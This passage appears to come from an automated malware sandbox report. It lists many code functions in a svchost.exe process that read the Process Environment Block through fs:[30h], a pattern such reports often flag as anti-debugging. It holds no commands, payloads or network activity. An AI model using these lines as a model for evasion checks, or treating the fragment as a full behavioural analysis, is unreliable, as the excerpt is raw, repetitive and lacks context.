            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4B1B0 mov eax, dword ptr fs:[00000030h]2_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D05152 mov eax, dword ptr fs:[00000030h]2_2_03D05152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov ecx, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29148 mov eax, dword ptr fs:[00000030h]2_2_03C29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29148 mov eax, dword ptr fs:[00000030h]2_2_03C29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29148 mov eax, dword ptr fs:[00000030h]2_2_03C29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29148 mov eax, dword ptr fs:[00000030h]2_2_03C29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C37152 mov eax, dword ptr fs:[00000030h]2_2_03C37152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C156 mov eax, dword ptr fs:[00000030h]2_2_03C2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC8158 mov eax, dword ptr fs:[00000030h]2_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F172 mov eax, dword ptr fs:[00000030h]2_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC9179 mov eax, dword ptr fs:[00000030h]2_2_03CC9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov ecx, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF0115 mov eax, dword ptr fs:[00000030h]2_2_03CF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60124 mov eax, dword ptr fs:[00000030h]2_2_03C60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C31131 mov eax, dword ptr fs:[00000030h]2_2_03C31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C31131 mov eax, dword ptr fs:[00000030h]2_2_03C31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B136 mov eax, dword ptr fs:[00000030h]2_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B136 mov eax, dword ptr fs:[00000030h]2_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B136 mov eax, dword ptr fs:[00000030h]2_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B136 mov eax, dword ptr fs:[00000030h]2_2_03C2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov ecx, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov ecx, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov ecx, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov ecx, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C0 mov eax, dword ptr fs:[00000030h]2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D050D9 mov eax, dword ptr fs:[00000030h]2_2_03D050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD0C0 mov eax, dword ptr fs:[00000030h]2_2_03CAD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD0C0 mov eax, dword ptr fs:[00000030h]2_2_03CAD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB20DE mov eax, dword ptr fs:[00000030h]2_2_03CB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C590DB mov eax, dword ptr fs:[00000030h]2_2_03C590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C550E4 mov eax, dword ptr fs:[00000030h]2_2_03C550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C550E4 mov ecx, dword ptr fs:[00000030h]2_2_03C550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03C2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C380E9 mov eax, dword ptr fs:[00000030h]2_2_03C380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB60E0 mov eax, dword ptr fs:[00000030h]2_2_03CB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03C2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C720F0 mov ecx, dword ptr fs:[00000030h]2_2_03C720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3208A mov eax, dword ptr fs:[00000030h]2_2_03C3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D08D mov eax, dword ptr fs:[00000030h]2_2_03C2D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C35096 mov eax, dword ptr fs:[00000030h]2_2_03C35096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5D090 mov eax, dword ptr fs:[00000030h]2_2_03C5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5D090 mov eax, dword ptr fs:[00000030h]2_2_03C5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6909C mov eax, dword ptr fs:[00000030h]2_2_03C6909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC80A8 mov eax, dword ptr fs:[00000030h]2_2_03CC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov eax, dword ptr fs:[00000030h]2_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32050 mov eax, dword ptr fs:[00000030h]2_2_03C32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD705E mov ebx, dword ptr fs:[00000030h]2_2_03CD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD705E mov eax, dword ptr fs:[00000030h]2_2_03CD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B052 mov eax, dword ptr fs:[00000030h]2_2_03C5B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6050 mov eax, dword ptr fs:[00000030h]2_2_03CB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB106E mov eax, dword ptr fs:[00000030h]2_2_03CB106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D05060 mov eax, dword ptr fs:[00000030h]2_2_03D05060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov ecx, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C073 mov eax, dword ptr fs:[00000030h]2_2_03C5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD070 mov ecx, dword ptr fs:[00000030h]2_2_03CAD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4000 mov ecx, dword ptr fs:[00000030h]2_2_03CB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A020 mov eax, dword ptr fs:[00000030h]2_2_03C2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C020 mov eax, dword ptr fs:[00000030h]2_2_03C2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF903E mov eax, dword ptr fs:[00000030h]2_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF903E mov eax, dword ptr fs:[00000030h]2_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF903E mov eax, dword ptr fs:[00000030h]2_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF903E mov eax, dword ptr fs:[00000030h]2_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C357C0 mov eax, dword ptr fs:[00000030h]2_2_03C357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C357C0 mov eax, dword ptr fs:[00000030h]2_2_03C357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C357C0 mov eax, dword ptr fs:[00000030h]2_2_03C357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB07C3 mov eax, dword ptr fs:[00000030h]2_2_03CB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3D7E0 mov ecx, dword ptr fs:[00000030h]2_2_03C3D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF78A mov eax, dword ptr fs:[00000030h]2_2_03CEF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB97A9 mov eax, dword ptr fs:[00000030h]2_2_03CB97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBF7AF mov eax, dword ptr fs:[00000030h]2_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBF7AF mov eax, dword ptr fs:[00000030h]2_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBF7AF mov eax, dword ptr fs:[00000030h]2_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBF7AF mov eax, dword ptr fs:[00000030h]2_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBF7AF mov eax, dword ptr fs:[00000030h]2_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D037B6 mov eax, dword ptr fs:[00000030h]2_2_03D037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C307AF mov eax, dword ptr fs:[00000030h]2_2_03C307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5D7B0 mov eax, dword ptr fs:[00000030h]2_2_03C5D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43740 mov eax, dword ptr fs:[00000030h]2_2_03C43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43740 mov eax, dword ptr fs:[00000030h]2_2_03C43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43740 mov eax, dword ptr fs:[00000030h]2_2_03C43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov esi, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30750 mov eax, dword ptr fs:[00000030h]2_2_03C30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D03749 mov eax, dword ptr fs:[00000030h]2_2_03D03749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4755 mov eax, dword ptr fs:[00000030h]2_2_03CB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B765 mov eax, dword ptr fs:[00000030h]2_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B765 mov eax, dword ptr fs:[00000030h]2_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B765 mov eax, dword ptr fs:[00000030h]2_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B765 mov eax, dword ptr fs:[00000030h]2_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38770 mov eax, dword ptr fs:[00000030h]2_2_03C38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C37703 mov eax, dword ptr fs:[00000030h]2_2_03C37703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C35702 mov eax, dword ptr fs:[00000030h]2_2_03C35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C35702 mov eax, dword ptr fs:[00000030h]2_2_03C35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C700 mov eax, dword ptr fs:[00000030h]2_2_03C6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30710 mov eax, dword ptr fs:[00000030h]2_2_03C30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60710 mov eax, dword ptr fs:[00000030h]2_2_03C60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6F71F mov eax, dword ptr fs:[00000030h]2_2_03C6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6F71F mov eax, dword ptr fs:[00000030h]2_2_03C6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF72E mov eax, dword ptr fs:[00000030h]2_2_03CEF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C33720 mov eax, dword ptr fs:[00000030h]2_2_03C33720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4F720 mov eax, dword ptr fs:[00000030h]2_2_03C4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4F720 mov eax, dword ptr fs:[00000030h]2_2_03C4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4F720 mov eax, dword ptr fs:[00000030h]2_2_03C4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF972B mov eax, dword ptr fs:[00000030h]2_2_03CF972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B73C mov eax, dword ptr fs:[00000030h]2_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B73C mov eax, dword ptr fs:[00000030h]2_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B73C mov eax, dword ptr fs:[00000030h]2_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B73C mov eax, dword ptr fs:[00000030h]2_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29730 mov eax, dword ptr fs:[00000030h]2_2_03C29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29730 mov eax, dword ptr fs:[00000030h]2_2_03C29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C65734 mov eax, dword ptr fs:[00000030h]2_2_03C65734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3973A mov eax, dword ptr fs:[00000030h]2_2_03C3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3973A mov eax, dword ptr fs:[00000030h]2_2_03C3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov ecx, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAC730 mov eax, dword ptr fs:[00000030h]2_2_03CAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC mov eax, dword ptr fs:[00000030h]2_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC mov eax, dword ptr fs:[00000030h]2_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC mov eax, dword ptr fs:[00000030h]2_2_03CF16CC
